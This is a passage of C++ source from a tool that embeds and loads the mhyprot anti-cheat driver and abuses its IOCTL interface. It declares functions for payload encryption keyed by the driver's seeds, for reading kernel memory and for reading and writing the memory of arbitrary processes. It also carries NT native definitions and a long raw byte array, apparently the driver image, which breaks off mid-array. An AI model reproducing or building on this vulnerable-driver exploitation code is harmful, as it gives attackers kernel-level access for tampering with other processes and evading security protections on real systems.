DWORD64 buffer;
DWORD64 address;
ULONG size;
ULONG unknown_02;
} MHYPROT_USER_READ_WRITE_REQUEST, *PMHYPROT_USER_READ_WRITE_REQUEST;
namespace detail
{
inline HANDLE device_handle;
inline uint64_t seedmap[312];
inline SC_HANDLE mhyplot_service_handle;
}
bool init();
void unload();
namespace driver_impl
{
bool request_ioctl(DWORD ioctl_code, LPVOID in_buffer, DWORD in_buffer_size);
bool driver_init(bool debug_prints = false, bool print_seeds = false);
uint64_t generate_key(uint64_t seed);
void encrypt_payload(void* payload, size_t size);
bool read_kernel_memory(uint64_t address, void* buffer, size_t size);
template<class T> __forceinline T read_kernel_memory(uint64_t address)
{
T buffer{}; // zero-initialized so a failed read does not return garbage
read_kernel_memory(address, &buffer, sizeof(T));
return buffer;
}
bool read_user_memory(uint32_t process_id, uint64_t address, void* buffer, size_t size);
template<class T> __forceinline T read_user_memory(uint32_t process_id, uint64_t address)
{
T buffer{}; // zero-initialized so a failed read does not return garbage
read_user_memory(process_id, address, &buffer, sizeof(T));
return buffer;
}
bool write_user_memory(uint32_t process_id, uint64_t address, void* buffer, size_t size);
template<class T> __forceinline bool write_user_memory(uint32_t process_id, uint64_t address, T value)
{
return write_user_memory(process_id, address, &value, sizeof(T));
}
}
}
================================================
FILE: src/nt.hpp
================================================
#pragma once
#include <Windows.h>
//
// windows native definitions
//
#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#endif
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)
#define STATUS_NOT_IMPLEMENTED ((NTSTATUS)0xC0000002L)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_INVALID_CID ((NTSTATUS)0xC000000BL)
#define STATUS_NO_SUCH_DEVICE ((NTSTATUS)0xC000000EL)
#define STATUS_NO_SUCH_FILE ((NTSTATUS)0xC000000FL)
#define STATUS_INVALID_DEVICE_REQUEST ((NTSTATUS)0xC0000010L)
#define STATUS_MORE_PROCESSING_REQUIRED ((NTSTATUS)0xC0000016L)
#define STATUS_CONFLICTING_ADDRESSES ((NTSTATUS)0xC0000018L)
#define STATUS_NO_MORE_ENTRIES ((NTSTATUS)0x8000001AL)
#define STATUS_BUFFER_TOO_SMALL ((NTSTATUS)0xC0000023L)
#define STATUS_INVALID_PAGE_PROTECTION ((NTSTATUS)0xC0000045L)
#define STATUS_PROCEDURE_NOT_FOUND ((NTSTATUS)0xC000007AL)
#define STATUS_INSUFFICIENT_RESOURCES ((NTSTATUS)0xC000009AL)
#define STATUS_INSTRUCTION_MISALIGNMENT ((NTSTATUS)0xC00000AAL)
#define STATUS_INTERNAL_ERROR ((NTSTATUS)0xC00000E5L)
#define STATUS_INVALID_PARAMETER_1 ((NTSTATUS)0xC00000EFL)
#define STATUS_INVALID_PARAMETER_2 ((NTSTATUS)0xC00000F0L)
#define STATUS_INVALID_PARAMETER_3 ((NTSTATUS)0xC00000F1L)
#define STATUS_INVALID_PARAMETER_4 ((NTSTATUS)0xC00000F2L)
#define STATUS_INVALID_PARAMETER_5 ((NTSTATUS)0xC00000F3L)
#define STATUS_INVALID_PARAMETER_6 ((NTSTATUS)0xC00000F4L)
#define STATUS_INVALID_PARAMETER_7 ((NTSTATUS)0xC00000F5L)
#define STATUS_INVALID_PARAMETER_8 ((NTSTATUS)0xC00000F6L)
#define STATUS_INVALID_PARAMETER_9 ((NTSTATUS)0xC00000F7L)
#define STATUS_INVALID_PARAMETER_10 ((NTSTATUS)0xC00000F8L)
#define STATUS_INVALID_PARAMETER_11 ((NTSTATUS)0xC00000F9L)
#define STATUS_INVALID_PARAMETER_12 ((NTSTATUS)0xC00000FAL)
#define STATUS_INVALID_ADDRESS ((NTSTATUS)0xC0000141L)
#define STATUS_DATATYPE_MISALIGNMENT_ERROR ((NTSTATUS)0xC00002C5L)
typedef enum _SYSTEM_INFORMATION_CLASS
{
SystemBasicInformation = 0,
SystemProcessorInformation = 1,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3,
SystemPathInformation = 4,
SystemProcessInformation = 5,
SystemCallCountInformation = 6,
SystemDeviceInformation = 7,
SystemProcessorPerformanceInformation = 8,
SystemFlagsInformation = 9,
SystemCallTimeInformation = 10,
SystemModuleInformation = 11,
SystemLocksInformation = 12,
SystemStackTraceInformation = 13,
SystemPagedPoolInformation = 14,
SystemNonPagedPoolInformation = 15,
SystemHandleInformation = 16,
SystemObjectInformation = 17,
SystemPageFileInformation = 18,
SystemVdmInstemulInformation = 19,
SystemVdmBopInformation = 20,
SystemFileCacheInformation = 21,
SystemPoolTagInformation = 22,
SystemInterruptInformation = 23,
SystemDpcBehaviorInformation = 24,
SystemFullMemoryInformation = 25,
SystemLoadGdiDriverInformation = 26,
SystemUnloadGdiDriverInformation = 27,
SystemTimeAdjustmentInformation = 28,
SystemSummaryMemoryInformation = 29,
SystemMirrorMemoryInformation = 30,
SystemPerformanceTraceInformation = 31,
SystemObsolete0 = 32,
SystemExceptionInformation = 33,
SystemCrashDumpStateInformation = 34,
SystemKernelDebuggerInformation = 35,
SystemContextSwitchInformation = 36,
SystemRegistryQuotaInformation = 37,
SystemExtendServiceTableInformation = 38,
SystemPrioritySeperation = 39,
SystemVerifierAddDriverInformation = 40,
SystemVerifierRemoveDriverInformation = 41,
SystemProcessorIdleInformation = 42,
SystemLegacyDriverInformation = 43,
SystemCurrentTimeZoneInformation = 44,
SystemLookasideInformation = 45,
SystemTimeSlipNotification = 46,
SystemSessionCreate = 47,
SystemSessionDetach = 48,
SystemSessionInformation = 49,
SystemRangeStartInformation = 50,
SystemVerifierInformation = 51,
SystemVerifierThunkExtend = 52,
SystemSessionProcessInformation = 53,
SystemLoadGdiDriverInSystemSpace = 54,
SystemNumaProcessorMap = 55,
SystemPrefetcherInformation = 56,
SystemExtendedProcessInformation = 57,
SystemRecommendedSharedDataAlignment = 58,
SystemComPlusPackage = 59,
SystemNumaAvailableMemory = 60,
SystemProcessorPowerInformation = 61,
SystemEmulationBasicInformation = 62,
SystemEmulationProcessorInformation = 63,
SystemExtendedHandleInformation = 64,
SystemLostDelayedWriteInformation = 65,
SystemBigPoolInformation = 66,
SystemSessionPoolTagInformation = 67,
SystemSessionMappedViewInformation = 68,
SystemHotpatchInformation = 69,
SystemObjectSecurityMode = 70,
SystemWatchdogTimerHandler = 71,
SystemWatchdogTimerInformation = 72,
SystemLogicalProcessorInformation = 73,
SystemWow64SharedInformation = 74,
SystemRegisterFirmwareTableInformationHandler = 75,
SystemFirmwareTableInformation = 76,
SystemModuleInformationEx = 77,
SystemVerifierTriageInformation = 78,
SystemSuperfetchInformation = 79,
SystemMemoryListInformation = 80,
SystemFileCacheInformationEx = 81,
MaxSystemInfoClass = 82
} SYSTEM_INFORMATION_CLASS;
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY
{
ULONG Unknow1;
ULONG Unknow2;
ULONG Unknow3;
ULONG Unknow4;
PVOID DllBase;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT ModuleNameOffset;
char ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, * PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION
{
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
typedef NTSTATUS(WINAPI* pNtQuerySystemInformation)(
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength
);
================================================
FILE: src/raw_driver.hpp
================================================
#pragma once
#include <cstdint>
namespace resource
{
const uint8_t raw_driver[] =
{
0x2D, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x8C, 0x24, 0x98, 0x00, 0x00, 0x00,
0xFF, 0x15, 0xC2, 0x67, 0x00, 0x00, 0x84, 0xC0, 0x0F, 0x84, 0x17, 0x01,
0x00, 0x00, 0x33, 0xD2, 0x41, 0xB8, 0x08, 0x02, 0x00, 0x00, 0x48, 0x8D,
0x8C, 0x24, 0xA0, 0x01, 0x00, 0x00, 0xE8, 0xD5, 0x5F, 0x00, 0x00, 0x4C,
0x8D, 0x05, 0x7E, 0x61, 0x00, 0x00, 0x49, 0x8B, 0xD6, 0x48, 0x8D, 0x8C,
0x24, 0xA0, 0x01, 0x00, 0x00, 0xE8, 0xC2, 0x06, 0x00, 0x00, 0x4C, 0x8B,
0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x49, 0x8B, 0xD6, 0x48, 0x8D, 0x8C,
0x24, 0xA0, 0x01, 0x00, 0x00, 0xE8, 0xDA, 0x05, 0x00, 0x00, 0x48, 0x8D,
0x94, 0x24, 0xA0, 0x01, 0x00, 0x00, 0x48, 0x8D, 0x4C, 0x24, 0x50, 0xFF,
0x15, 0xEB, 0x66, 0x00, 0x00, 0x48, 0x83, 0xA4, 0x24, 0xE8, 0x03, 0x00,
0x00, 0x00, 0x48, 0x8D, 0x84, 0x24, 0xE8, 0x03, 0x00, 0x00, 0x48, 0x89,
0x44, 0x24, 0x38, 0x48, 0x83, 0x64, 0x24, 0x30, 0x00, 0xC6, 0x44, 0x24,
0x28, 0x00, 0x48, 0x8B, 0x05, 0x73, 0x67, 0x00, 0x00, 0x48, 0x8B, 0x08,
0x48, 0x89, 0x4C, 0x24, 0x20, 0x45, 0x33, 0xC9, 0x45, 0x33, 0xC0, 0x41,
0x8D, 0x51, 0x40, 0x48, 0x8D, 0x4C, 0x24, 0x50, 0xFF, 0x15, 0x36, 0x67,
0x00, 0x00, 0x89, 0x44, 0x24, 0x40, 0x85, 0xC0, 0x75, 0x73, 0x48, 0x8B,
0x8C, 0x24, 0xE8, 0x03, 0x00, 0x00, 0xFF, 0x15, 0x08, 0x67, 0x00, 0x00,
0x3C, 0x01, 0x75, 0x53, 0x48, 0x8B, 0x94, 0x24, 0xE8, 0x03, 0x00, 0x00,
0x48, 0x8B, 0xCF, 0xE8, 0x70, 0x00, 0x00, 0x00, 0x84, 0xC0, 0x75, 0x3F,
0xBA, 0x30, 0x04, 0x00, 0x00, 0x33, 0xC9, 0xFF, 0x15, 0x73, 0x66, 0x00,
0x00, 0x48, 0x8B, 0xD8, 0x48, 0x8D, 0x50, 0x10, 0x48, 0x8B, 0x8C, 0x24,
0xE8, 0x03, 0x00, 0x00, 0xE8, 0x53, 0x04, 0x00, 0x00, 0x48, 0x8B, 0x07,
0x48, 0x39, 0x78, 0x08, 0x74, 0x07, 0xB9, 0x03, 0x00, 0x00, 0x00, 0xCD,
0x29, 0x48, 0x89, 0x03, 0x48, 0x89, 0x7B, 0x08, 0x48, 0x89, 0x58, 0x08,
0x48, 0x89, 0x1F, 0x48, 0x8B, 0x8C, 0x24, 0xE8, 0x03, 0x00, 0x00, 0xFF,
0x15, 0xCB, 0x68, 0x00, 0x00, 0xE9, 0x54, 0xFE, 0xFF, 0xFF, 0xBB, 0x01,
0x00, 0x00, 0xC0, 0x89, 0x5C, 0x24, 0x40, 0x8B, 0xC3, 0x48, 0x81, 0xC4,
0xB0, 0x03, 0x00, 0x00, 0x41, 0x5E, 0x5F, 0x5B, 0xC3, 0xCC, 0xCC, 0xCC,
0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x6C, 0x24, 0x10, 0x48, 0x89,
0x74, 0x24, 0x18, 0x57, 0x48, 0x83, 0xEC, 0x20, 0x48, 0x8B, 0x19, 0x40,
0x32, 0xFF, 0x48, 0x8B, 0xEA, 0x48, 0x8B, 0xF1, 0x48, 0x3B, 0xD9, 0x74,
0x21, 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x56, 0x66, 0x00, 0x00, 0x40, 0x3A,
0xC7, 0x74, 0x13, 0x48, 0x39, 0x6B, 0x10, 0x74, 0x0A, 0x48, 0x8B, 0x1B,
0x48, 0x3B, 0xDE, 0x75, 0xE4, 0xEB, 0x03, 0x40, 0xB7, 0x01, 0x48, 0x8B,
0x5C, 0x24, 0x30, 0x40, 0x8A, 0xC7, 0x48, 0x8B, 0x6C, 0x24, 0x38, 0x48,
0x8B, 0x74, 0x24, 0x40, 0x48, 0x83, 0xC4, 0x20, 0x5F, 0xC3, 0xCC, 0xCC,
0x48, 0x89, 0x5C, 0x24, 0x08, 0x57, 0x48, 0x83, 0xEC, 0x30, 0x48, 0x8B,
0xF9, 0x32, 0xDB, 0xFF, 0x15, 0x0F, 0x66, 0x00, 0x00, 0x3A, 0xC3, 0x74,
0x1D, 0x48, 0x8B, 0x4F, 0x08, 0xFF, 0x15, 0x01, 0x66, 0x00, 0x00, 0x0F,
0xB6, 0xCB, 0xBA, 0x01, 0x00, 0x00, 0x00, 0x3A, 0xC3, 0x0F, 0x45, 0xCA,
0x8A, 0xD9, 0x88, 0x4C, 0x24, 0x20, 0xEB, 0x06, 0x32, 0xDB, 0x88, 0x5C,
0x24, 0x20, 0x8A, 0xC3, 0x48, 0x8B, 0x5C, 0x24, 0x40, 0x48, 0x83, 0xC4,
0x30, 0x5F, 0xC3, 0xCC, 0x48, 0x83, 0xEC, 0x28, 0x48, 0x8B, 0xC2, 0x49,
0x8B, 0xD0, 0x85, 0xC9, 0x48, 0x8B, 0xC8, 0x75, 0x07, 0xE8, 0x12, 0x00,
0x00, 0x00, 0xEB, 0x09, 0xE8, 0xBF, 0x01, 0x00, 0x00, 0xEB, 0x02, 0x32,
0xC0, 0x48, 0x83, 0xC4, 0x28, 0xC3, 0xCC, 0xCC, 0x48, 0x8B, 0xC4, 0x48,
0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x56, 0x57, 0x41, 0x54, 0x41,
0x56, 0x41, 0x57, 0x48, 0x83, 0xEC, 0x40, 0x33, 0xFF, 0x4C, 0x8D, 0x48,
0x18, 0x4C, 0x8B, 0xF2, 0x89, 0x78, 0x18, 0x4C, 0x8B, 0xF9, 0x48, 0x8D,
0x50, 0x18, 0x45, 0x33, 0xC0, 0x8D, 0x5F, 0x0B, 0x8B, 0xCB, 0xE8, 0xAF,
0x59, 0x00, 0x00, 0x3D, 0x04, 0x00, 0x00, 0xC0, 0x75, 0x3B, 0x8B, 0x94,
0x24, 0x80, 0x00, 0x00, 0x00, 0x33, 0xC9, 0xFF, 0x15, 0xF3, 0x64, 0x00,
0x00, 0x48, 0x8B, 0xF0, 0x48, 0x85, 0xC0, 0x74, 0x24, 0x44, 0x8B, 0x84,
0x24, 0x80, 0x00, 0x00, 0x00, 0x45, 0x33, 0xC9, 0x48, 0x8B, 0xD0, 0x8B,
0xCB, 0xE8, 0x7C, 0x59, 0x00, 0x00, 0x85, 0xC0, 0x79, 0x24, 0x33, 0xD2,
0x48, 0x8B, 0xCE, 0xFF, 0x15, 0xD7, 0x64, 0x00, 0x00, 0x32, 0xC0, 0x48,
0x8B, 0x5C, 0x24, 0x70, 0x48, 0x8B, 0x6C, 0x24, 0x78, 0x48, 0x83, 0xC4,
0x40, 0x41, 0x5F, 0x41, 0x5E, 0x41, 0x5C, 0x5F, 0x5E, 0xC3, 0x44, 0x8B,
0xC7, 0x39, 0x3E, 0x76, 0x26, 0x41, 0x8B, 0xC0, 0x48, 0x69, 0xD0, 0x28,
0x01, 0x00, 0x00, 0x48, 0x8B, 0x05, 0x36, 0x65, 0x00, 0x00, 0x48, 0x8B,
0x08, 0x48, 0x39, 0x4C, 0x32, 0x18, 0x76, 0x03, 0x41, 0xFF, 0x06, 0x41,
0xFF, 0xC0, 0x44, 0x3B, 0x06, 0x72, 0xDA, 0x41, 0x8B, 0x06, 0x85, 0xC0,
0x74, 0xB3, 0x48, 0x69, 0xD0, 0x20, 0x04, 0x00, 0x00, 0x33, 0xC9, 0xFF,
0x15, 0x6B, 0x64, 0x00, 0x00, 0x49, 0x89, 0x07, 0x48, 0x85, 0xC0, 0x74,
0x9C, 0x41, 0x8B, 0x0E, 0x33, 0xD2, 0x4C, 0x69, 0xC1, 0x20, 0x04, 0x00,
0x00, 0x48, 0x8B, 0xC8, 0xE8, 0xEF, 0x5C, 0x00, 0x00, 0x8B, 0xEF, 0x39,
0x3E, 0x0F, 0x86, 0xA6, 0x00, 0x00, 0x00, 0x41, 0xBC, 0x03, 0x01, 0x00,
0x00, 0x8B, 0xC5, 0x48, 0x69, 0xD0, 0x28, 0x01, 0x00, 0x00, 0x48, 0x8B,
0x05, 0xCF, 0x64, 0x00, 0x00, 0x48, 0x8B, 0x4C, 0x32, 0x18, 0x48, 0x3B,
0x08, 0x76, 0x7C, 0x41, 0x3B, 0x3E, 0x73, 0x75, 0x8B, 0xC7, 0x48, 0x69,
0xD8, 0x20, 0x04, 0x00, 0x00, 0x49, 0x8B, 0x07, 0x48, 0x89, 0x4C, 0x03,
0x08, 0x8B, 0x44, 0x32, 0x20, 0x48, 0x83, 0xC2, 0x30, 0x49, 0x8B, 0x0F,
0x48, 0x03, 0xD6, 0x89, 0x44, 0x0B, 0x10, 0x48, 0x8D, 0x4C, 0x24, 0x30,
0xFF, 0x15, 0x3A, 0x64, 0x00, 0x00, 0x41, 0xB0, 0x01, 0x48, 0x8D, 0x54,
0x24, 0x30, 0x48, 0x8D, 0x4C, 0x24, 0x20, 0xFF, 0x15, 0x2F, 0x64, 0x00,
0x00, 0x0F, 0xB7, 0x44, 0x24, 0x20, 0x45, 0x8B, 0xC4, 0x66, 0x44, 0x3B,
0x64, 0x24, 0x20, 0x48, 0x8B, 0x54, 0x24, 0x28, 0x44, 0x0F, 0x43, 0xC0,
0x49, 0x8B, 0x07, 0x48, 0x8D, 0x88, 0x14, 0x01, 0x00, 0x00, 0x48, 0x03,
0xCB, 0xE8, 0x16, 0x59, 0x00, 0x00, 0x48, 0x8D, 0x4C, 0x24, 0x20, 0xFF,
0x15, 0x03, 0x64, 0x00, 0x00, 0xFF, 0xC7, 0xFF, 0xC5, 0x3B, 0x2E, 0x0F,
0x82, 0x60, 0xFF, 0xFF, 0xFF, 0x33, 0xD2, 0x48, 0x8B, 0xCE, 0xFF, 0x15,
0xA4, 0x63, 0x00, 0x00, 0xB0, 0x01, 0xE9, 0xC8, 0xFE, 0xFF, 0xFF, 0xCC,
0x4C, 0x8B, 0xDC, 0x49, 0x89, 0x5B, 0x08, 0x49, 0x89, 0x6B, 0x10, 0x49,
0x89, 0x73, 0x18, 0x49, 0x89, 0x7B, 0x20, 0x41, 0x56, 0x48, 0x83, 0xEC,
0x30, 0x49, 0x8D, 0x43, 0xE8, 0x48, 0x8B, 0xF2, 0x49, 0x89, 0x43, 0xF0,
0x49, 0x8D, 0x53, 0xE8, 0x49, 0x8D, 0x43, 0xE8, 0x4C, 0x8B, 0xF1, 0x48,
0x8D, 0x0D, 0xC6, 0x5D, 0x00, 0x00, 0x49, 0x89, 0x43, 0xE8, 0xE8, 0x11,
0xF8, 0xFF, 0xFF, 0x48, 0x8D, 0x4C, 0x24, 0x20, 0xE8, 0xDF, 0xFA, 0xFF,
0xFF, 0x48, 0x8D, 0x4C, 0x24, 0x20, 0xE8, 0x7D, 0x4F, 0x00, 0x00, 0x89,
0x06, 0x85, 0xC0, 0x0F, 0x84, 0x03, 0x01, 0x00, 0x00, 0x8B, 0xC0, 0x33,
0xC9, 0x48, 0x69, 0xD0, 0x20, 0x04, 0x00, 0x00, 0xFF, 0x15, 0x1E, 0x63,
0x00, 0x00, 0x49, 0x89, 0x06, 0x48, 0x85, 0xC0, 0x0F, 0x84, 0xE6, 0x00,
0x00, 0x00, 0x8B, 0x0E, 0x33, 0xD2, 0x4C, 0x69, 0xC1, 0x20, 0x04, 0x00,
0x00, 0x48, 0x8B, 0xC8, 0xE8, 0x9F, 0x5B, 0x00, 0x00, 0x48, 0x8B, 0x5C,
0x24, 0x20, 0x48, 0x8D, 0x44, 0x24, 0x20, 0x33, 0xFF, 0x48, 0x3B, 0xD8,
0x0F, 0x84, 0xBA, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x51,
0x63, 0x00, 0x00, 0x84, 0xC0, 0x0F, 0x84, 0xA9, 0x00, 0x00, 0x00, 0x48,
0x8B, 0xCB, 0x48, 0x8B, 0xEB, 0xFF, 0x15, 0x3D, 0x63, 0x00, 0x00, 0x84,
0xC0, 0x0F, 0x84, 0x95, 0x00, 0x00, 0x00, 0x3B, 0x3E, 0x73, 0x73, 0x8B,
0xC7, 0x41, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x48, 0x69, 0xD0, 0x20, 0x04,
0x00, 0x00, 0x48, 0x8D, 0x43, 0x10, 0x49, 0x03, 0x16, 0x0F, 0x10, 0x00,
0x0F, 0x11, 0x02, 0x48, 0x8D, 0x92, 0x80, 0x00, 0x00, 0x00, 0x0F, 0x10,
0x48, 0x10, 0x0F, 0x11, 0x4A, 0x90, 0x0F, 0x10, 0x40, 0x20, 0x0F, 0x11,
0x42, 0xA0, 0x0F, 0x10, 0x48, 0x30, 0x0F, 0x11, 0x4A, 0xB0, 0x0F, 0x10,
0x40, 0x40, 0x0F, 0x11, 0x42, 0xC0, 0x0F, 0x10, 0x48, 0x50, 0x0F, 0x11,
0x4A, 0xD0, 0x0F, 0x10, 0x40, 0x60, 0x0F, 0x11, 0x42, 0xE0, 0x0F, 0x10,
0x48, 0x70, 0x48, 0x83, 0xE8, 0x80, 0x0F, 0x11, 0x4A, 0xF0, 0x49, 0x83,
0xE8, 0x01, 0x75, 0xB1, 0x0F, 0x10, 0x00, 0x0F, 0x11, 0x02, 0x0F, 0x10,
0x48, 0x10, 0x0F, 0x11, 0x4A, 0x10, 0x48, 0x8B, 0x1B, 0x33, 0xD2, 0x48,
0x8B, 0xCD, 0xFF, 0xC7, 0xFF, 0x15, 0x4E, 0x62, 0x00, 0x00, 0x48, 0x8D,
0x4C, 0x24, 0x20, 0x48, 0x3B, 0xD9, 0x0F, 0x85, 0x46, 0xFF, 0xFF, 0xFF,
0xB0, 0x01, 0xEB, 0x02, 0x32, 0xC0, 0x48, 0x8B, 0x5C, 0x24, 0x40, 0x48,
0x8B, 0x6C, 0x24, 0x48, 0x48, 0x8B, 0x74, 0x24, 0x50, 0x48, 0x8B, 0x7C,
0x24, 0x58, 0x48, 0x83, 0xC4, 0x30, 0x41, 0x5E, 0xC3, 0xCC, 0xCC, 0xCC,
0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x74, 0x24, 0x10, 0x57, 0x48,
0x83, 0xEC, 0x20, 0x48, 0x8B, 0x59, 0x28, 0x48, 0x8B, 0xF1, 0x48, 0x8D,
0x4A, 0x08, 0x48, 0x8B, 0xFA, 0x33, 0xD2, 0x41, 0xB8, 0x18, 0x04, 0x00,
0x00, 0xE8, 0x82, 0x5A, 0x00, 0x00, 0x48, 0x89, 0x37, 0x4C, 0x8B, 0x46,
0x18, 0x4C, 0x89, 0x47, 0x08, 0x8B, 0x46, 0x20, 0x89, 0x47, 0x10, 0x4D,
0x85, 0xC0, 0x75, 0x15, 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x33, 0x62, 0x00,
0x00, 0x3C, 0x01, 0x75, 0x08, 0x48, 0x8B, 0x43, 0x30, 0x48, 0x89, 0x47,
0x08, 0x83, 0x7F, 0x10, 0x00, 0x75, 0x13, 0x48, 0x8B, 0xCB, 0xFF, 0x15,
0x18, 0x62, 0x00, 0x00, 0x3C, 0x01, 0x75, 0x06, 0x8B, 0x43, 0x40, 0x89,
0x47, 0x10, 0x48, 0x8D, 0x56, 0x40, 0x48, 0x85, 0xD2, 0x74, 0x20, 0x0F,
0xB7, 0x46, 0x38, 0x41, 0xB8, 0x7F, 0x00, 0x00, 0x00, 0x66, 0x44, 0x3B,
0xC0, 0x72, 0x04, 0x44, 0x0F, 0xB7, 0xC0, 0x48, 0x8B, 0x12, 0x48, 0x8D,
0x4F, 0x14, 0xE8, 0xD5, 0x56, 0x00, 0x00, 0x48, 0x8B, 0xCB, 0xFF, 0x15,
0xDC, 0x61, 0x00, 0x00, 0x3C, 0x01, 0x75, 0x2C, 0x48, 0x8D, 0x53, 0x50,
0x48, 0x85, 0xD2, 0x74, 0x23, 0x0F, 0xB7, 0x43, 0x48, 0x41, 0xB8, 0x03,
0x01, 0x00, 0x00, 0x66, 0x44, 0x3B, 0xC0, 0x72, 0x04, 0x44, 0x0F, 0xB7,
0xC0, 0x48, 0x8B, 0x12, 0x48, 0x8D, 0x8F, 0x14, 0x01, 0x00, 0x00, 0xE8,
0x9C, 0x56, 0x00, 0x00, 0x48, 0x8B, 0x5C, 0x24, 0x30, 0x48, 0x8B, 0x74,
0x24, 0x38, 0x48, 0x83, 0xC4, 0x20, 0x5F, 0xC3, 0x48, 0x89, 0x5C, 0x24,
0x08, 0x33, 0xDB, 0x4C, 0x8B, 0xD2, 0x4D, 0x8B, 0xD8, 0x44, 0x8B, 0xCB,
0x41, 0xB8, 0x0D, 0x00, 0x00, 0xC0, 0x48, 0x8B, 0xD1, 0x49, 0x8D, 0x42,
0xFF, 0x48, 0x3D, 0xFE, 0xFF, 0xFF, 0x7F, 0x45, 0x0F, 0x47, 0xC8, 0x45,
0x85, 0xC9, 0x78, 0x36, 0x49, 0x8B, 0xCA, 0x48, 0x8B, 0xC2, 0x4D, 0x85,
0xD2, 0x74, 0x0F, 0x66, 0x39, 0x18, 0x74, 0x0A, 0x48, 0x83, 0xC0, 0x02,
0x48, 0x83, 0xE9, 0x01, 0x75, 0xF1, 0x48, 0x8B, 0xC1, 0x48, 0xF7, 0xD8,
0x45, 0x1B, 0xC9, 0x41, 0xF7, 0xD1, 0x45, 0x23, 0xC8, 0x48, 0x85, 0xC9,
0x74, 0x08, 0x4D, 0x8B, 0xC2, 0x4C, 0x2B, 0xC1, 0xEB, 0x03, 0x4C, 0x8B,
0xC3, 0x45, 0x85, 0xC9, 0x78, 0x5C, 0x49, 0x8B, 0xCA, 0x4A, 0x8D, 0x14,
0x42, 0x49, 0x2B, 0xC8, 0x74, 0x32, 0x48, 0x8B, 0xC1, 0x4D, 0x8D, 0x88,
0xFE, 0xFF, 0xFF, 0x7F, 0x49, 0x2B, 0xC2, 0x4C, 0x03, 0xC8, 0x4C, 0x2B,
0xDA, 0x4D, 0x85, 0xC9, 0x74, 0x1A, 0x41, 0x0F, 0xB7, 0x04, 0x13, 0x66,
0x85, 0xC0, 0x74, 0x10, 0x66, 0x89, 0x02, 0x49, 0xFF, 0xC9, 0x48, 0x83,
0xC2, 0x02, 0x48, 0x83, 0xE9, 0x01, 0x75, 0xE1, 0x48, 0x85, 0xC9, 0x48,
0x8D, 0x42, 0xFE, 0x48, 0x0F, 0x45, 0xC2, 0x48, 0xF7, 0xD9, 0x45, 0x1B,
0xC9, 0x41, 0xF7, 0xD1, 0x41, 0x81, 0xE1, 0x05, 0x00, 0x00, 0x80, 0x66,
0x89, 0x18, 0x48, 0x8B, 0x5C, 0x24, 0x08, 0x41, 0x8B, 0xC1, 0xC3, 0xCC,
0x48, 0x89, 0x5C, 0x24, 0x08, 0x33, 0xDB, 0x48, 0x8D, 0x42, 0xFF, 0x41,
0xBA, 0xFE, 0xFF, 0xFF, 0x7F, 0x44, 0x8B, 0xCB, 0x49, 0x3B, 0xC2, 0x41,
0xBB, 0x0D, 0x00, 0x00, 0xC0, 0x45, 0x0F, 0x47, 0xCB, 0x45, 0x85, 0xC9,
0x78, 0x4B, 0x48, 0x85, 0xD2, 0x74, 0x26, 0x4C, 0x2B, 0xD2, 0x4C, 0x2B,
0xC1, 0x49, 0x8D, 0x04, 0x12, 0x48, 0x85, 0xC0, 0x74, 0x17, 0x41, 0x0F,
0xB7, 0x04, 0x08, 0x66, 0x85, 0xC0, 0x74, 0x0D, 0x66, 0x89, 0x01, 0x48,
0x83, 0xC1, 0x02, 0x48, 0x83, 0xEA, 0x01, 0x75, 0xE0, 0x48, 0x85, 0xD2,
0x48, 0x8D, 0x41, 0xFE, 0x48, 0x0F, 0x45, 0xC1, 0x48, 0xF7, 0xDA, 0x45,
0x1B, 0xC9, 0x41, 0xF7, 0xD1, 0x41, 0x81, 0xE1, 0x05, 0x00, 0x00, 0x80,
0x66, 0x89, 0x18, 0xEB, 0x08, 0x48, 0x85, 0xD2, 0x74, 0x03, 0x66, 0x89,
0x19, 0x48, 0x8B, 0x5C, 0x24, 0x08, 0x41, 0x8B, 0xC1, 0xC3, 0xCC, 0xCC,
0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x6C, 0x24, 0x10, 0x48, 0x89,
0x74, 0x24, 0x18, 0x57, 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xEC, 0x20,
0x49, 0x8B, 0xF0, 0x8B, 0xDA, 0x44, 0x8B, 0xC2, 0x48, 0x8B, 0xF9, 0x48,
0x8B, 0xD1, 0x4D, 0x8B, 0xF9, 0x48, 0x8B, 0xCE, 0xE8, 0x07, 0x55, 0x00,
0x00, 0x48, 0xC1, 0xEB, 0x03, 0x33, 0xED, 0x48, 0x85, 0xDB, 0x74, 0x57,
0x44, 0x8B, 0xF5, 0x48, 0x2B, 0xFE, 0x49, 0x8B, 0xCF, 0xE8, 0xDE, 0x0D,
0x00, 0x00, 0x49, 0x63, 0xCE, 0xFF, 0xC5, 0x49, 0x03, 0x4F, 0x10, 0x41,
0x83, 0xC6, 0x10, 0x48, 0x33, 0xC1, 0x48, 0x8B, 0x0C, 0x37, 0x48, 0x33,
0xC8, 0xB8, 0xD3, 0x20, 0x0D, 0xD2, 0x48, 0x89, 0x0E, 0x48, 0x8D, 0x76,
